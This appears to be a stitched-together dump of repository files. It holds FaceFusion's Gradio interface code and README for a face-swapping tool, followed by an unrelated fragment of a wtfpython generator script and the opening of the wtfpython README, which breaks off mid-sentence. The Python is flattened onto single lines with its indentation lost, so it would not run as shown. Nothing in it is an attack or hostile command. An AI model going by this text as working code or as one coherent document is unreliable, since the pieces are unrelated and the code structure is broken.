facefusion.globals.output_video_resolution = pack_resolution(output_video_resolution) facefusion.globals.output_video_fps = detect_video_fps(facefusion.globals.target_path) return gradio.Slider(visible = False), gradio.Dropdown(visible = False), gradio.Dropdown(visible = True), gradio.Dropdown(visible = True), gradio.Slider(visible = True), gradio.Dropdown(visible = True, value = facefusion.globals.output_video_resolution, choices = output_video_resolutions), gradio.Slider(visible = True, value = facefusion.globals.output_video_fps) return gradio.Slider(visible = False), gradio.Dropdown(visible = False, value = None, choices = None), gradio.Dropdown(visible = False), gradio.Dropdown(visible = False), gradio.Slider(visible = False), gradio.Dropdown(visible = False, value = None, choices = None), gradio.Slider(visible = False, value = None) def update_output_path(output_path : str) -> None: facefusion.globals.output_path = output_path def update_output_image_quality(output_image_quality : int) -> None: facefusion.globals.output_image_quality = output_image_quality def update_output_image_resolution(output_image_resolution : str) -> None: facefusion.globals.output_image_resolution = output_image_resolution def update_output_video_encoder(output_video_encoder: OutputVideoEncoder) -> None: facefusion.globals.output_video_encoder = output_video_encoder def update_output_video_preset(output_video_preset : OutputVideoPreset) -> None: facefusion.globals.output_video_preset = output_video_preset def update_output_video_quality(output_video_quality : int) -> None: facefusion.globals.output_video_quality = output_video_quality def update_output_video_resolution(output_video_resolution : str) -> None: facefusion.globals.output_video_resolution = output_video_resolution def update_output_video_fps(output_video_fps : Fps) -> None: facefusion.globals.output_video_fps = output_video_fps File: facefusion/uis/components/face_masker.py from typing import Optional, Tuple, List import gradio import facefusion.globals import facefusion.choices from facefusion import wording from facefusion.typing import FaceMaskType, FaceMaskRegion from facefusion.uis.core import register_ui_component FACE_MASK_TYPES_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None FACE_MASK_BLUR_SLIDER : Optional[gradio.Slider] = None FACE_MASK_BOX_GROUP : Optional[gradio.Group] = None FACE_MASK_REGION_GROUP : Optional[gradio.Group] = None 
FACE_MASK_PADDING_TOP_SLIDER : Optional[gradio.Slider] = None FACE_MASK_PADDING_RIGHT_SLIDER : Optional[gradio.Slider] = None FACE_MASK_PADDING_BOTTOM_SLIDER : Optional[gradio.Slider] = None FACE_MASK_PADDING_LEFT_SLIDER : Optional[gradio.Slider] = None FACE_MASK_REGION_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None def render() -> None: global FACE_MASK_TYPES_CHECKBOX_GROUP global FACE_MASK_BLUR_SLIDER global FACE_MASK_BOX_GROUP global FACE_MASK_REGION_GROUP global FACE_MASK_PADDING_TOP_SLIDER global FACE_MASK_PADDING_RIGHT_SLIDER global FACE_MASK_PADDING_BOTTOM_SLIDER global FACE_MASK_PADDING_LEFT_SLIDER global FACE_MASK_REGION_CHECKBOX_GROUP has_box_mask = 'box' in facefusion.globals.face_mask_types has_region_mask = 'region' in facefusion.globals.face_mask_types FACE_MASK_TYPES_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.face_mask_types_checkbox_group'), choices = facefusion.choices.face_mask_types, value = facefusion.globals.face_mask_types ) with gradio.Group(visible = has_box_mask) as FACE_MASK_BOX_GROUP: FACE_MASK_BLUR_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_blur_slider'), step = facefusion.choices.face_mask_blur_range[1] - facefusion.choices.face_mask_blur_range[0], minimum = facefusion.choices.face_mask_blur_range[0], maximum = facefusion.choices.face_mask_blur_range[-1], value = facefusion.globals.face_mask_blur ) with gradio.Row(): FACE_MASK_PADDING_TOP_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_padding_top_slider'), step = facefusion.choices.face_mask_padding_range[1] - facefusion.choices.face_mask_padding_range[0], minimum = facefusion.choices.face_mask_padding_range[0], maximum = facefusion.choices.face_mask_padding_range[-1], value = facefusion.globals.face_mask_padding[0] ) FACE_MASK_PADDING_RIGHT_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_padding_right_slider'), step = facefusion.choices.face_mask_padding_range[1] - facefusion.choices.face_mask_padding_range[0], minimum = facefusion.choices.face_mask_padding_range[0], maximum = facefusion.choices.face_mask_padding_range[-1], value = facefusion.globals.face_mask_padding[1] ) with gradio.Row(): FACE_MASK_PADDING_BOTTOM_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_padding_bottom_slider'), step = facefusion.choices.face_mask_padding_range[1] - facefusion.choices.face_mask_padding_range[0], minimum = facefusion.choices.face_mask_padding_range[0], maximum = facefusion.choices.face_mask_padding_range[-1], value = facefusion.globals.face_mask_padding[2] ) FACE_MASK_PADDING_LEFT_SLIDER = gradio.Slider( label = wording.get('uis.face_mask_padding_left_slider'), step = facefusion.choices.face_mask_padding_range[1] - facefusion.choices.face_mask_padding_range[0], minimum = facefusion.choices.face_mask_padding_range[0], maximum = facefusion.choices.face_mask_padding_range[-1], value = facefusion.globals.face_mask_padding[3] ) with gradio.Row(): FACE_MASK_REGION_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.face_mask_region_checkbox_group'), choices = facefusion.choices.face_mask_regions, value = facefusion.globals.face_mask_regions, visible = has_region_mask ) register_ui_component('face_mask_types_checkbox_group', FACE_MASK_TYPES_CHECKBOX_GROUP) register_ui_component('face_mask_blur_slider', FACE_MASK_BLUR_SLIDER) register_ui_component('face_mask_padding_top_slider', FACE_MASK_PADDING_TOP_SLIDER) register_ui_component('face_mask_padding_right_slider', FACE_MASK_PADDING_RIGHT_SLIDER) 
register_ui_component('face_mask_padding_bottom_slider', FACE_MASK_PADDING_BOTTOM_SLIDER) register_ui_component('face_mask_padding_left_slider', FACE_MASK_PADDING_LEFT_SLIDER) register_ui_component('face_mask_region_checkbox_group', FACE_MASK_REGION_CHECKBOX_GROUP) def listen() -> None: FACE_MASK_TYPES_CHECKBOX_GROUP.change(update_face_mask_type, inputs = FACE_MASK_TYPES_CHECKBOX_GROUP, outputs = [ FACE_MASK_TYPES_CHECKBOX_GROUP, FACE_MASK_BOX_GROUP, FACE_MASK_REGION_CHECKBOX_GROUP ]) FACE_MASK_BLUR_SLIDER.release(update_face_mask_blur, inputs = FACE_MASK_BLUR_SLIDER) FACE_MASK_REGION_CHECKBOX_GROUP.change(update_face_mask_regions, inputs = FACE_MASK_REGION_CHECKBOX_GROUP, outputs = FACE_MASK_REGION_CHECKBOX_GROUP) face_mask_padding_sliders = [ FACE_MASK_PADDING_TOP_SLIDER, FACE_MASK_PADDING_RIGHT_SLIDER, FACE_MASK_PADDING_BOTTOM_SLIDER, FACE_MASK_PADDING_LEFT_SLIDER ] for face_mask_padding_slider in face_mask_padding_sliders: face_mask_padding_slider.release(update_face_mask_padding, inputs = face_mask_padding_sliders) def update_face_mask_type(face_mask_types : List[FaceMaskType]) -> Tuple[gradio.CheckboxGroup, gradio.Group, gradio.CheckboxGroup]: facefusion.globals.face_mask_types = face_mask_types or facefusion.choices.face_mask_types has_box_mask = 'box' in face_mask_types has_region_mask = 'region' in face_mask_types return gradio.CheckboxGroup(value = facefusion.globals.face_mask_types), gradio.Group(visible = has_box_mask), gradio.CheckboxGroup(visible = has_region_mask) def update_face_mask_blur(face_mask_blur : float) -> None: facefusion.globals.face_mask_blur = face_mask_blur def update_face_mask_padding(face_mask_padding_top : int, face_mask_padding_right : int, face_mask_padding_bottom : int, face_mask_padding_left : int) -> None: facefusion.globals.face_mask_padding = (face_mask_padding_top, face_mask_padding_right, face_mask_padding_bottom, face_mask_padding_left) def update_face_mask_regions(face_mask_regions : List[FaceMaskRegion]) -> gradio.CheckboxGroup: facefusion.globals.face_mask_regions = face_mask_regions or facefusion.choices.face_mask_regions return gradio.CheckboxGroup(value = facefusion.globals.face_mask_regions) File: facefusion/uis/components/output.py from typing import Tuple, Optional from time import sleep import gradio import facefusion.globals from facefusion import process_manager, wording from facefusion.core import conditional_process from facefusion.memory import limit_system_memory from facefusion.normalizer import normalize_output_path from facefusion.uis.core import get_ui_component from facefusion.filesystem import clear_temp, is_image, is_video OUTPUT_IMAGE : Optional[gradio.Image] = None OUTPUT_VIDEO : Optional[gradio.Video] = None OUTPUT_START_BUTTON : Optional[gradio.Button] = None OUTPUT_CLEAR_BUTTON : Optional[gradio.Button] = None OUTPUT_STOP_BUTTON : Optional[gradio.Button] = None def render() -> None: global OUTPUT_IMAGE global OUTPUT_VIDEO global OUTPUT_START_BUTTON global OUTPUT_STOP_BUTTON global OUTPUT_CLEAR_BUTTON OUTPUT_IMAGE = gradio.Image( label = wording.get('uis.output_image_or_video'), visible = False ) OUTPUT_VIDEO = gradio.Video( label = wording.get('uis.output_image_or_video') ) OUTPUT_START_BUTTON = gradio.Button( value = wording.get('uis.start_button'), variant = 'primary', size = 'sm' ) OUTPUT_STOP_BUTTON = gradio.Button( value = wording.get('uis.stop_button'), variant = 'primary', size = 'sm', visible = False ) OUTPUT_CLEAR_BUTTON = gradio.Button( value = wording.get('uis.clear_button'), size = 'sm' ) def listen() -> 
None: output_path_textbox = get_ui_component('output_path_textbox') if output_path_textbox: OUTPUT_START_BUTTON.click(start, outputs = [ OUTPUT_START_BUTTON, OUTPUT_STOP_BUTTON ]) OUTPUT_START_BUTTON.click(process, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO, OUTPUT_START_BUTTON, OUTPUT_STOP_BUTTON ]) OUTPUT_STOP_BUTTON.click(stop, outputs = [ OUTPUT_START_BUTTON, OUTPUT_STOP_BUTTON ]) OUTPUT_CLEAR_BUTTON.click(clear, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) def start() -> Tuple[gradio.Button, gradio.Button]: while not process_manager.is_processing(): sleep(0.5) return gradio.Button(visible = False), gradio.Button(visible = True) def process() -> Tuple[gradio.Image, gradio.Video, gradio.Button, gradio.Button]: normed_output_path = normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path) if facefusion.globals.system_memory_limit > 0: limit_system_memory(facefusion.globals.system_memory_limit) conditional_process() if is_image(normed_output_path): return gradio.Image(value = normed_output_path, visible = True), gradio.Video(value = None, visible = False), gradio.Button(visible = True), gradio.Button(visible = False) if is_video(normed_output_path): return gradio.Image(value = None, visible = False), gradio.Video(value = normed_output_path, visible = True), gradio.Button(visible = True), gradio.Button(visible = False) return gradio.Image(value = None), gradio.Video(value = None), gradio.Button(visible = True), gradio.Button(visible = False) def stop() -> Tuple[gradio.Button, gradio.Button]: process_manager.stop() return gradio.Button(visible = True), gradio.Button(visible = False) def clear() -> Tuple[gradio.Image, gradio.Video]: while process_manager.is_processing(): sleep(0.5) if facefusion.globals.target_path: clear_temp(facefusion.globals.target_path) return gradio.Image(value = None), gradio.Video(value = None) File: facefusion/uis/layouts/benchmark.py import multiprocessing import gradio import facefusion.globals from facefusion.download import conditional_download from facefusion.uis.components import about, frame_processors, frame_processors_options, execution, execution_thread_count, execution_queue_count, memory, benchmark_options, benchmark def pre_check() -> bool: if not facefusion.globals.skip_download: conditional_download('.assets/examples', [ 'https://github.com/facefusion/facefusion-assets/releases/download/examples/source.jpg', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/source.mp3', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-240p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-360p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-540p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-720p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-1080p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-1440p.mp4', 'https://github.com/facefusion/facefusion-assets/releases/download/examples/target-2160p.mp4' ]) return True return False def pre_render() -> bool: return True def render() -> gradio.Blocks: with gradio.Blocks() as layout: with gradio.Row(): with gradio.Column(scale = 2): with gradio.Blocks(): about.render() with gradio.Blocks(): frame_processors.render() with gradio.Blocks(): frame_processors_options.render() with gradio.Blocks(): execution.render() execution_thread_count.render() 
execution_queue_count.render() with gradio.Blocks(): memory.render() with gradio.Blocks(): benchmark_options.render() with gradio.Column(scale = 5): with gradio.Blocks(): benchmark.render() return layout def listen() -> None: frame_processors.listen() frame_processors_options.listen() execution.listen() execution_thread_count.listen() execution_queue_count.listen() memory.listen() benchmark.listen() def run(ui : gradio.Blocks) -> None: concurrency_count = min(2, multiprocessing.cpu_count()) ui.queue(concurrency_count = concurrency_count).launch(show_api = False, quiet = True, inbrowser = facefusion.globals.open_browser) File: facefusion/uis/layouts/default.py import multiprocessing import gradio import facefusion.globals from facefusion.uis.components import about, frame_processors, frame_processors_options, execution, execution_thread_count, execution_queue_count, memory, temp_frame, output_options, common_options, source, target, output, preview, trim_frame, face_analyser, face_selector, face_masker def pre_check() -> bool: return True def pre_render() -> bool: return True def render() -> gradio.Blocks: with gradio.Blocks() as layout: with gradio.Row(): with gradio.Column(scale = 2): with gradio.Blocks(): about.render() with gradio.Blocks(): frame_processors.render() with gradio.Blocks(): frame_processors_options.render() with gradio.Blocks(): execution.render() execution_thread_count.render() execution_queue_count.render() with gradio.Blocks(): memory.render() with gradio.Blocks(): temp_frame.render() with gradio.Blocks(): output_options.render() with gradio.Column(scale = 2): with gradio.Blocks(): source.render() with gradio.Blocks(): target.render() with gradio.Blocks(): output.render() with gradio.Column(scale = 3): with gradio.Blocks(): preview.render() with gradio.Blocks(): trim_frame.render() with gradio.Blocks(): face_selector.render() with gradio.Blocks(): face_masker.render() with gradio.Blocks(): face_analyser.render() with gradio.Blocks(): common_options.render() return layout def listen() -> None: frame_processors.listen() frame_processors_options.listen() execution.listen() execution_thread_count.listen() execution_queue_count.listen() memory.listen() temp_frame.listen() output_options.listen() source.listen() target.listen() output.listen() preview.listen() trim_frame.listen() face_selector.listen() face_masker.listen() face_analyser.listen() common_options.listen() def run(ui : gradio.Blocks) -> None: concurrency_count = min(8, multiprocessing.cpu_count()) ui.queue(concurrency_count = concurrency_count).launch(show_api = False, quiet = True, inbrowser = facefusion.globals.open_browser) File: facefusion/uis/layouts/webcam.py import multiprocessing import gradio import facefusion.globals from facefusion.uis.components import about, frame_processors, frame_processors_options, execution, execution_thread_count, webcam_options, source, webcam def pre_check() -> bool: return True def pre_render() -> bool: return True def render() -> gradio.Blocks: with gradio.Blocks() as layout: with gradio.Row(): with gradio.Column(scale = 2): with gradio.Blocks(): about.render() with gradio.Blocks(): frame_processors.render() with gradio.Blocks(): frame_processors_options.render() with gradio.Blocks(): execution.render() execution_thread_count.render() with gradio.Blocks(): webcam_options.render() with gradio.Blocks(): source.render() with gradio.Column(scale = 5): with gradio.Blocks(): webcam.render() return layout def listen() -> None: frame_processors.listen() 
frame_processors_options.listen() execution.listen() execution_thread_count.listen() source.listen() webcam.listen() def run(ui : gradio.Blocks) -> None: concurrency_count = min(2, multiprocessing.cpu_count()) ui.queue(concurrency_count = concurrency_count).launch(show_api = False, quiet = True, inbrowser = facefusion.globals.open_browser)
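The layout modules above compose the UI from component modules that all follow the same convention: module-level widget handles, a render() that builds the widgets, and a listen() that wires their events, with shared widgets exchanged through register_ui_component / get_ui_component. The snippet below is a minimal, self-contained sketch of that convention only; the DEMO_* names and update_demo are hypothetical, nothing is imported from facefusion, and the only assumption is a gradio version that supports the release event used throughout the modules above.

```py
# Minimal sketch of the render()/listen() component convention (hypothetical component).
from typing import Optional
import gradio

DEMO_SLIDER : Optional[gradio.Slider] = None
DEMO_TEXTBOX : Optional[gradio.Textbox] = None


def render() -> None:
    # build the widgets and keep module-level handles, as the facefusion components do
    global DEMO_SLIDER
    global DEMO_TEXTBOX

    DEMO_SLIDER = gradio.Slider(label = 'demo slider', value = 50, step = 1, minimum = 0, maximum = 100)
    DEMO_TEXTBOX = gradio.Textbox(label = 'demo value', max_lines = 1)


def listen() -> None:
    # wire events only after all widgets exist
    DEMO_SLIDER.release(update_demo, inputs = DEMO_SLIDER, outputs = DEMO_TEXTBOX)


def update_demo(demo_value : int) -> str:
    return str(demo_value)


with gradio.Blocks() as layout:
    render()
    listen()

if __name__ == '__main__':
    layout.launch(show_api = False)
```

The layout modules above do the same thing at a larger scale: their render() composes many component render() calls inside a gradio.Blocks context, and their listen() wires all component events afterwards.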
FaceFusion
==========

> Next generation face swapper and enhancer.

[![Build Status](https://img.shields.io/github/actions/workflow/status/facefusion/facefusion/ci.yml.svg?branch=master)](https://github.com/facefusion/facefusion/actions?query=workflow:ci)
![License](https://img.shields.io/badge/license-MIT-green)


Preview
-------

![Preview](https://raw.githubusercontent.com/facefusion/facefusion/master/.github/preview.png?sanitize=true)


Installation
------------

Be aware that the [installation](https://docs.facefusion.io/installation) requires technical skills and is not recommended for beginners. In case you are not comfortable using a terminal, our [Windows Installer](https://buymeacoffee.com/henryruhs/e/251939) can have you up and running in minutes.


Usage
-----

Run the command:

```
python run.py [options]

options:
  -h, --help                              show this help message and exit
  -c CONFIG_PATH, --config CONFIG_PATH    choose the config file to override defaults
  -s SOURCE_PATHS, --source SOURCE_PATHS  choose single or multiple source images or audios
  -t TARGET_PATH, --target TARGET_PATH    choose single target image or video
  -o OUTPUT_PATH, --output OUTPUT_PATH    specify the output file or directory
  -v, --version                           show program's version number and exit

misc:
  --force-download                        force automatic downloads and exit
  --skip-download                         omit automatic downloads and remote lookups
  --headless                              run the program without a user interface
  --log-level {error,warn,info,debug}     adjust the message severity displayed in the terminal

execution:
  --execution-device-id EXECUTION_DEVICE_ID                            specify the device used for processing
  --execution-providers EXECUTION_PROVIDERS [EXECUTION_PROVIDERS ...]  accelerate the model inference using different providers (choices: cpu, ...)
  --execution-thread-count [1-128]                                     specify the amount of parallel threads while processing
  --execution-queue-count [1-32]                                       specify the amount of frames each thread is processing

memory:
  --video-memory-strategy {strict,moderate,tolerant}  balance fast frame processing and low VRAM usage
  --system-memory-limit [0-128]                       limit the available RAM that can be used while processing

face analyser:
  --face-analyser-order {left-right,right-left,top-bottom,bottom-top,small-large,large-small,best-worst,worst-best}  specify the order in which the face analyser detects faces
  --face-analyser-age {child,teen,adult,senior}                 filter the detected faces based on their age
  --face-analyser-gender {female,male}                          filter the detected faces based on their gender
  --face-detector-model {many,retinaface,scrfd,yoloface,yunet}  choose the model responsible for detecting the face
  --face-detector-size FACE_DETECTOR_SIZE                       specify the size of the frame provided to the face detector
  --face-detector-score [0.0-0.95]                              filter the detected faces based on the confidence score
  --face-landmarker-score [0.0-0.95]                            filter the detected landmarks based on the confidence score

face selector:
  --face-selector-mode {many,one,reference}          use reference based tracking or simple matching
  --reference-face-position REFERENCE_FACE_POSITION  specify the position used to create the reference face
  --reference-face-distance [0.0-1.45]               specify the desired similarity between the reference face and target face
  --reference-frame-number REFERENCE_FRAME_NUMBER    specify the frame used to create the reference face

face mask:
  --face-mask-types FACE_MASK_TYPES [FACE_MASK_TYPES ...]        mix and match different face mask types (choices: box, occlusion, region)
  --face-mask-blur [0.0-0.95]                                    specify the degree of blur applied to the box mask
  --face-mask-padding FACE_MASK_PADDING [FACE_MASK_PADDING ...]  apply top, right, bottom and left padding to the box mask
  --face-mask-regions FACE_MASK_REGIONS [FACE_MASK_REGIONS ...]  choose the facial features used for the region mask (choices: skin, left-eyebrow, right-eyebrow, left-eye, right-eye, glasses, nose, mouth, upper-lip, lower-lip)

frame extraction:
  --trim-frame-start TRIM_FRAME_START  specify the start frame of the target video
  --trim-frame-end TRIM_FRAME_END      specify the end frame of the target video
  --temp-frame-format {bmp,jpg,png}    specify the temporary resources format
  --keep-temp                          keep the temporary resources after processing

output creation:
  --output-image-quality [0-100]                                                               specify the image quality which translates to the compression factor
  --output-image-resolution OUTPUT_IMAGE_RESOLUTION                                            specify the image output resolution based on the target image
  --output-video-encoder {libx264,libx265,libvpx-vp9,h264_nvenc,hevc_nvenc,h264_amf,hevc_amf}  specify the encoder used for the video compression
  --output-video-preset {ultrafast,superfast,veryfast,faster,fast,medium,slow,slower,veryslow} balance fast video processing and video file size
  --output-video-quality [0-100]                                                               specify the video quality which translates to the compression factor
  --output-video-resolution OUTPUT_VIDEO_RESOLUTION                                            specify the video output resolution based on the target video
  --output-video-fps OUTPUT_VIDEO_FPS                                                          specify the video output fps based on the target video
  --skip-audio                                                                                 omit the audio from the target video

frame processors:
  --frame-processors FRAME_PROCESSORS [FRAME_PROCESSORS ...]           load a single or multiple frame processors (choices: face_debugger, face_enhancer, face_swapper, frame_colorizer, frame_enhancer, lip_syncer, ...)
  --face-debugger-items FACE_DEBUGGER_ITEMS [FACE_DEBUGGER_ITEMS ...]  load a single or multiple face debugger items (choices: bounding-box, face-landmark-5, face-landmark-5/68, face-landmark-68, face-landmark-68/5, face-mask, face-detector-score, face-landmarker-score, age, gender)
  --face-enhancer-model {codeformer,gfpgan_1.2,gfpgan_1.3,gfpgan_1.4,gpen_bfr_256,gpen_bfr_512,gpen_bfr_1024,gpen_bfr_2048,restoreformer_plus_plus}  choose the model responsible for enhancing the face
  --face-enhancer-blend [0-100]                                        blend the enhanced face into the previous face
  --face-swapper-model {blendswap_256,inswapper_128,inswapper_128_fp16,simswap_256,simswap_512_unofficial,uniface_256}  choose the model responsible for swapping the face
  --frame-colorizer-model {ddcolor,ddcolor_artistic,deoldify,deoldify_artistic,deoldify_stable}  choose the model responsible for colorizing the frame
  --frame-colorizer-blend [0-100]                                      blend the colorized frame into the previous frame
  --frame-colorizer-size {192x192,256x256,384x384,512x512}             specify the size of the frame provided to the frame colorizer
  --frame-enhancer-model {clear_reality_x4,lsdir_x4,nomos8k_sc_x4,real_esrgan_x2,real_esrgan_x2_fp16,real_esrgan_x4,real_esrgan_x4_fp16,real_hatgan_x4,span_kendata_x4,ultra_sharp_x4}  choose the model responsible for enhancing the frame
  --frame-enhancer-blend [0-100]                                       blend the enhanced frame into the previous frame
  --lip-syncer-model {wav2lip_gan}                                     choose the model responsible for syncing the lips

uis:
  --open-browser                           open the browser once the program is ready
  --ui-layouts UI_LAYOUTS [UI_LAYOUTS ...] launch a single or multiple UI layouts (choices: benchmark, default, webcam, ...)
```

Documentation
-------------

Read the [documentation](https://docs.facefusion.io) for a deep dive.
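As a concrete companion to the Usage section above, here is a small hedged example that drives a headless run from Python. The source, target and output paths are placeholders, and the flags are taken from the option listing above, so substitute your own files and options.

```py
# Hedged sketch: run FaceFusion headlessly with placeholder paths (adjust to your files).
import subprocess

subprocess.run(
    [
        'python', 'run.py',
        '--headless',
        '-s', 'source.jpg',      # placeholder source image
        '-t', 'target.mp4',      # placeholder target video
        '-o', 'output.mp4',      # placeholder output file
        '--frame-processors', 'face_swapper', 'face_enhancer',
        '--execution-providers', 'cpu'
    ],
    check = True
)
```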
Hiddent treasures", "f": "Strain your Brain", "c": "Be careful of these", "m": "Miscallaneous" } categories_in_order = ["a", "t", "f", "c", "m"] for category in categories_in_order: snips = snips_by_cat[category] for i, snip in enumerate(snips): print(i, ":", snip["title"]) content = "" for _ in snips: snip = snips[int(raw_input())] is_new = " *" if snip["is_new"] else "" content += snippet_template.format(title=snip["title"].strip(), is_new=is_new, description=snip["description"].strip().replace("\n\n", "\n"), explanation=snip["explanation"].strip().replace("\n\n", "\n")) result += category_template.format(category=category_names[category], content=content.replace("\n\n\n", "\n\n")) with open("generated.md", "w") as f: f.write(result.replace("\n\n\n", "\n\n")) print("Done!")
<p align="center"><img src="/images/logo.png#gh-light-mode-only" alt=""><img src="/images/logo-dark.png#gh-dark-mode-only" alt=""></p> <h1 align="center">What the f*ck Python! 😱</h1> <p align="center">Exploring and understanding Python through surprising snippets.</p> Translations: [Chinese 中文](https://github.com/leisurelicht/wtfpython-cn) | [Vietnamese Tiếng Việt](https://github.com/vuduclyunitn/wtfptyhon-vi) | [Spanish Español](https://web.archive.org/web/20220511161045/https://github.com/JoseDeFreitas/wtfpython-es) | [Korean 한국어](https://github.com/buttercrab/wtfpython-ko) | [Russian Русский](https://github.com/satwikkansal/wtfpython/tree/master/translations/ru-russian) | [German Deutsch](https://github.com/BenSt099/wtfpython) | [Add translation](https://github.com/satwikkansal/wtfpython/issues/new?title=Add%20translation%20for%20[LANGUAGE]&body=Expected%20time%20to%20finish:%20[X]%20weeks.%20I%27ll%20start%20working%20on%20it%20from%20[Y].) Other modes: [Interactive Website](https://wtfpython-interactive.vercel.app) | [Interactive Notebook](https://colab.research.google.com/github/satwikkansal/wtfpython/blob/master/irrelevant/wtf.ipynb) | [CLI](https://pypi.python.org/pypi/wtfpython) Python, being a beautifully designed high-level and interpreter-based programming language, provides us with many features for the programmer's comfort. But sometimes, the outcomes of a Python snippet may not seem obvious at first sight. Here's a fun project attempting to explain what exactly is happening under the hood for some counter-intuitive snippets and lesser-known features in Python. While some of the examples you see below may not be WTFs in the truest sense, but they'll reveal some of the interesting parts of Python that you might be unaware of. I find it a nice way to learn the internals of a programming language, and I believe that you'll find it interesting too! If you're an experienced Python programmer, you can take it as a challenge to get most of them right in the first attempt. You may have already experienced some of them before, and I might be able to revive sweet old memories of yours! :sweat_smile: PS: If you're a returning reader, you can learn about the new modifications [here](https://github.com/satwikkansal/wtfpython/releases/) (the examples marked with asterisk are the ones added in the latest major revision). So, here we go... # Table of Contents <!-- Generated using "markdown-toc -i README.md --maxdepth 3"--> <!-- toc --> - [Structure of the Examples](#structure-of-the-examples) + [▶ Some fancy Title](#-some-fancy-title) - [Usage](#usage) - [👀 Examples](#-examples) * [Section: Strain your brain!](#section-strain-your-brain) + [▶ First things first! *](#-first-things-first-) + [▶ Strings can be tricky sometimes](#-strings-can-be-tricky-sometimes) + [▶ Be careful with chained operations](#-be-careful-with-chained-operations) + [▶ How not to use `is` operator](#-how-not-to-use-is-operator) + [▶ Hash brownies](#-hash-brownies) + [▶ Deep down, we're all the same.](#-deep-down-were-all-the-same) + [▶ Disorder within order *](#-disorder-within-order-) + [▶ Keep trying... 
*](#-keep-trying-) + [▶ For what?](#-for-what) + [▶ Evaluation time discrepancy](#-evaluation-time-discrepancy) + [▶ `is not ...` is not `is (not ...)`](#-is-not--is-not-is-not-) + [▶ A tic-tac-toe where X wins in the first attempt!](#-a-tic-tac-toe-where-x-wins-in-the-first-attempt) + [▶ Schrödinger's variable](#-schrödingers-variable-) + [▶ The chicken-egg problem *](#-the-chicken-egg-problem-) + [▶ Subclass relationships](#-subclass-relationships) + [▶ Methods equality and identity](#-methods-equality-and-identity) + [▶ All-true-ation *](#-all-true-ation-) + [▶ The surprising comma](#-the-surprising-comma) + [▶ Strings and the backslashes](#-strings-and-the-backslashes) + [▶ not knot!](#-not-knot) + [▶ Half triple-quoted strings](#-half-triple-quoted-strings) + [▶ What's wrong with booleans?](#-whats-wrong-with-booleans) + [▶ Class attributes and instance attributes](#-class-attributes-and-instance-attributes) + [▶ yielding None](#-yielding-none) + [▶ Yielding from... return! *](#-yielding-from-return-) + [▶ Nan-reflexivity *](#-nan-reflexivity-) + [▶ Mutating the immutable!](#-mutating-the-immutable) + [▶ The disappearing variable from outer scope](#-the-disappearing-variable-from-outer-scope) + [▶ The mysterious key type conversion](#-the-mysterious-key-type-conversion) + [▶ Let's see if you can guess this?](#-lets-see-if-you-can-guess-this) + [▶ Exceeds the limit for integer string conversion](#-exceeds-the-limit-for-integer-string-conversion) * [Section: Slippery Slopes](#section-slippery-slopes) + [▶ Modifying a dictionary while iterating over it](#-modifying-a-dictionary-while-iterating-over-it) + [▶ Stubborn `del` operation](#-stubborn-del-operation) + [▶ The out of scope variable](#-the-out-of-scope-variable) + [▶ Deleting a list item while iterating](#-deleting-a-list-item-while-iterating) + [▶ Lossy zip of iterators *](#-lossy-zip-of-iterators-) + [▶ Loop variables leaking out!](#-loop-variables-leaking-out) + [▶ Beware of default mutable arguments!](#-beware-of-default-mutable-arguments) + [▶ Catching the Exceptions](#-catching-the-exceptions) + [▶ Same operands, different story!](#-same-operands-different-story) + [▶ Name resolution ignoring class scope](#-name-resolution-ignoring-class-scope) + [▶ Rounding like a banker *](#-rounding-like-a-banker-) + [▶ Needles in a Haystack *](#-needles-in-a-haystack-) + [▶ Splitsies *](#-splitsies-) + [▶ Wild imports *](#-wild-imports-) + [▶ All sorted? 
*](#-all-sorted-) + [▶ Midnight time doesn't exist?](#-midnight-time-doesnt-exist) * [Section: The Hidden treasures!](#section-the-hidden-treasures) + [▶ Okay Python, Can you make me fly?](#-okay-python-can-you-make-me-fly) + [▶ `goto`, but why?](#-goto-but-why) + [▶ Brace yourself!](#-brace-yourself) + [▶ Let's meet Friendly Language Uncle For Life](#-lets-meet-friendly-language-uncle-for-life) + [▶ Even Python understands that love is complicated](#-even-python-understands-that-love-is-complicated) + [▶ Yes, it exists!](#-yes-it-exists) + [▶ Ellipsis *](#-ellipsis-) + [▶ Inpinity](#-inpinity) + [▶ Let's mangle](#-lets-mangle) * [Section: Appearances are deceptive!](#section-appearances-are-deceptive) + [▶ Skipping lines?](#-skipping-lines) + [▶ Teleportation](#-teleportation) + [▶ Well, something is fishy...](#-well-something-is-fishy) * [Section: Miscellaneous](#section-miscellaneous) + [▶ `+=` is faster](#--is-faster) + [▶ Let's make a giant string!](#-lets-make-a-giant-string) + [▶ Slowing down `dict` lookups *](#-slowing-down-dict-lookups-) + [▶ Bloating instance `dict`s *](#-bloating-instance-dicts-) + [▶ Minor Ones *](#-minor-ones-) - [Contributing](#contributing) - [Acknowledgements](#acknowledgements) - [🎓 License](#-license) * [Surprise your friends as well!](#surprise-your-friends-as-well) * [More content like this?](#more-content-like-this) <!-- tocstop --> # Structure of the Examples All the examples are structured like below: > ### ▶ Some fancy Title > > ```py > # Set up the code. > # Preparation for the magic... > ``` > > **Output (Python version(s)):** > > ```py > >>> triggering_statement > Some unexpected output > ``` > (Optional): One line describing the unexpected output. > > > #### 💡 Explanation: > > * Brief explanation of what's happening and why is it happening. > ```py > # Set up code > # More examples for further clarification (if necessary) > ``` > **Output (Python version(s)):** > > ```py > >>> trigger # some example that makes it easy to unveil the magic > # some justified output > ``` **Note:** All the examples are tested on Python 3.5.2 interactive interpreter, and they should work for all the Python versions unless explicitly 